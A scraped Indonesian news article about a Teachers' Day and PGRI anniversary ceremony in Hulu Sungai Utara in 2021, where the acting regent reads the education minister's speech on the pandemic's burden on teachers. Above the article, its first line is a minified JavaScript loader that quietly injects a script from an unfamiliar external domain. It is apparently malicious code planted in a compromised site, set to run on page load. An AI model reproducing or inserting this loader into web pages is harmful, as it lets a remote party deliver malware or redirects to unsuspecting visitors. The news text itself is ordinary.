(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

HUT PGRI dan Hari Guru, Plt Bupati HSU: Pandemi Memberi Dampak Besar bagi Para Pendidik


KANALKALIMANTAN.COM, AMUNTAI – Plt Bupati Hulu Sungai Utara (HSU) Husairi Abdi hadiri peringatan HUT ke-76 Persatuan Guru Republik Indonesia (PGRI) dan Hari Guru Nasional (HGN) 2021 di Aula Dinas Pendidikan dan Kebudayaan Kabupaten HSU, Senin (29/11/2021).

Pada kesempatan itu, Husairi yang membacakan sambutan tertulis Menteri Pendidikan, Kebudayaan, Riset dan Teknologi Republik Indonesia, mengatakan, bahwa pandemi telah berdampak pada kehidupan guru di Indonesia.

“Guru dari Sabang sampai Merauke terpukul secara ekonomi, terpukul secara kesehatan, dan terpukul secara batin, Guru mau tidak mau mendatangi rumah-rumah pelajar untuk memastikan mereka tidak ketinggalan pelajaran,” katanya.

Guru, dalam kondisi saat ini mau tidak mau harus mempelajari teknologi yang belum pernah mereka kenal. Menyederhanakan kurikulum untuk memastikan murid mereka tidak belajar di bawah tekanan.

 

Baca juga : Banjir di Hulu Sungai, 19.171 Pelanggan PLN Sempat Tanpa Listrik

“Guru di seluruh Indonesia menangis melihat murid mereka semakin hari semakin bosan, kesepian, dan kehilangan disiplin. Tidak hanya tekanan psikologis karena Pembelajaran Jarak Jauh (PJJ), banyak guru mengalami tekanan ekonomi untuk memperjuangkan keluarga mereka agar bisa makan,” katanya.

Guru se-Indonesia menginginkan pemimpin-pemimpin sekolah mereka untuk berpihak kepada murid, bukan pada birokrasi, dan Guru se-Indonesia ingin kemerdekaan untuk berinovasi tanpa dijajah oleh keseragaman.

“Karena itulah, saya tidak akan menyerah untuk memperjuangkan Merdeka Belajar, demi kehidupan dan masa depan guru se-Indonesia yang lebih baik. Terima kasih yang sebesar-besarnya kepada semua guru se-Nusantara atas pengorbanan dan ketangguhannya. Merdeka Belajar ini sekarang milik Anda. Salam Merdeka Belajar,” tutupnya Plt Bupati HSU.

 

Baca juga : Empat ASN Pemkab HSU Terima Hadiah dari Bank Kalsel

Dalam kesempatan tersebut, di samping diisi dengan penandatanganan MoU antara PGRI HSU dengan BNN Kabupaten HSU, Plt Bupati HSU juga berkesempatan memberikan penghargaan kepada guru berprestasi yang selama ini turut andil dalam memajukan pendidikan.

Bertemakan” Bergerak dengan hati pulihkan pendidikan,” dalam kegiatan tersebut turut hadir Ketua DPRD HSU, Ketua PGRI Kalsel, Ketua PGRI HSU, Plt. Kadisdik HSU, Kepala BNN HSU, Perwakilan Polres HSU, Kepala Kemenag HSU, Penasehat PGRI HSU serta para anggota PGRI Kabupaten HSU lainnya. (kanalkalimantan.com/dew)

Reporter : dew
Editor : cell


Desy Arfianty

Recent Posts

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

2 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

2 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

2 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

2 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

3 jam ago

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23

KANALKALIMANTAN.COM, BANJARBARU - Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia… Read More

5 jam ago

This website uses cookies.